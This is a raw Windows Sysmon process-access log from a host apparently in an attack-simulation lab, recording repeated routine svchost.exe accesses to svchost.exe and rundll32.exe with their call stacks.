13:58:21.321{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010557Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.321{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010556Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.321{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010555Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.321{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010554Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.321{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010553Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.321{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010552Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.321{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010551Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.321{59A5CD1D-8E46-6005-1600-00000000A301}15442108C:\Windows\system32\svchost.exe{59A5CD1D-93FD-6005-FF04-00000000A301}2584C:\Windows\system32\rundll32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010550Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.321{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-93FD-6005-FF04-00000000A301}2584C:\Windows\system32\rundll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010549Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.305{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010548Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.305{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010547Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.305{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010546Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.305{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010545Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.305{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010544Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.305{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010543Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.305{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010542Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.305{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010541Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.305{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010540Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.305{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010539Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.305{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010538Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.305{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010537Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.305{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010536Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.305{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010535Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.305{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010534Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.305{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010533Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 